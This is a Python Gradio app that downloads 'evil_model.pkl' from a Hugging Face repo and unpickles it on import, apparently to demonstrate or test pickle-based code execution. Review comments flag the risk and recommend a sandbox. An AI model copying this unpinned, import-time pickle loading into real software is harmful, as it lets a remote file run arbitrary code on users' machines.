|
import hashlib
import os
import pickle
from typing import Optional

import gradio as gr
from huggingface_hub import hf_hub_download
|
|
|
|
|
def load_pickled_object(
    repo_id: str,
    filename: str,
    *,
    revision: Optional[str] = None,
    expected_sha256: Optional[str] = None,
):
    """Download ``filename`` from the Hub repo ``repo_id`` and unpickle it.

    The file is fetched with ``hf_hub_download`` into a per-repo cache
    directory ``.cache/<repo_id with "/" replaced by "_">`` (a path relative
    to the current working directory), then deserialized with
    ``pickle.load``.

    SECURITY: ``pickle.load`` can execute arbitrary code embedded in the
    file. Only call this on artifacts you trust. Pass ``revision`` (ideally
    a commit hash) and ``expected_sha256`` to pin the exact bytes you
    reviewed, so that a later change to the remote repo cannot silently
    swap in a different payload.

    Args:
        repo_id: Hub repository id, e.g. ``"user/name"``.
        filename: Path of the pickle file inside the repository.
        revision: Optional branch, tag or commit hash to download. ``None``
            keeps ``hf_hub_download``'s default revision.
        expected_sha256: Optional hex SHA-256 digest that the downloaded
            file must match before it is unpickled. The comparison ignores
            case and surrounding whitespace.

    Returns:
        The unpickled object.

    Raises:
        ValueError: If ``expected_sha256`` is given and the downloaded
            file's digest does not match it.
        Any exception propagated from ``hf_hub_download`` or
        ``pickle.load``.
    """
    cache_dir = os.path.join(".cache", repo_id.replace("/", "_"))
    os.makedirs(cache_dir, exist_ok=True)

    local_path = hf_hub_download(
        repo_id=repo_id,
        filename=filename,
        cache_dir=cache_dir,
        revision=revision,  # None == hf_hub_download's own default
        force_download=False,
    )

    if expected_sha256 is not None:
        digest = hashlib.sha256()
        with open(local_path, "rb") as fh:
            # Hash incrementally so a large model file is never held in memory at once.
            for chunk in iter(lambda: fh.read(1 << 20), b""):
                digest.update(chunk)
        actual = digest.hexdigest()
        if actual != expected_sha256.strip().lower():
            raise ValueError(
                f"SHA-256 mismatch for {repo_id}/{filename}: expected "
                f"{expected_sha256}, got {actual}; refusing to unpickle."
            )

    # SECURITY(review): this is where code embedded in the pickle runs.
    # Never point this at untrusted or unpinned remote files outside a sandbox.
    with open(local_path, "rb") as f:
        return pickle.load(f)
|
|
|
|
|
|
|
# Hugging Face Hub location of the pickled model artifact loaded at import time.
MODEL_REPO = "szk2024/test"
MODEL_FILE = "evil_model.pkl"

# SECURITY(review): the download and unpickling below run as soon as this
# module is imported. Unpickling can execute arbitrary code, and the file
# name suggests a deliberately malicious payload. Run this only in an
# isolated sandbox; do not deploy it.
# `model` stays None when loading fails, and predict() checks for that.
model = None
try:
    model = load_pickled_object(MODEL_REPO, MODEL_FILE)
except Exception as load_err:
    # Best-effort load: report the failure and keep the app importable.
    print("❌ 模型加载失败:", load_err)
|
|
|
|
|
def predict(text: str):
    """Run the module-level ``model`` on a single input string.

    Args:
        text: The raw text entered by the user.

    Returns:
        ``str`` of ``model.predict([text])`` on success. If the model failed
        to load (``model is None``), returns a fixed "model failed to load"
        message. If prediction raises, returns a message containing the
        exception text.
        NOTE(review): that exception text is shown to whoever calls the web UI.
    """
    if model is not None:
        try:
            # The model is called with a one-element batch wrapping the input.
            return str(model.predict([text]))
        except Exception as err:
            return f"预测失败:{err}"
    return "模型加载失败,请检查日志"
|
|
|
|
|
# Single-textbox web UI: forwards the entered text to predict() and displays
# its string result.
iface = gr.Interface(
    fn=predict,
    inputs=gr.Textbox(placeholder="在此输入内容…", lines=2),
    outputs="text",
    title="Pickle 模型调用示例",
    description="从 Hugging Face Hub 下载 pickle 并反序列化后预测",
)


if __name__ == "__main__":
    # Listen on all network interfaces (0.0.0.0), port 7860.
    iface.launch(server_port=7860, server_name="0.0.0.0")
|
|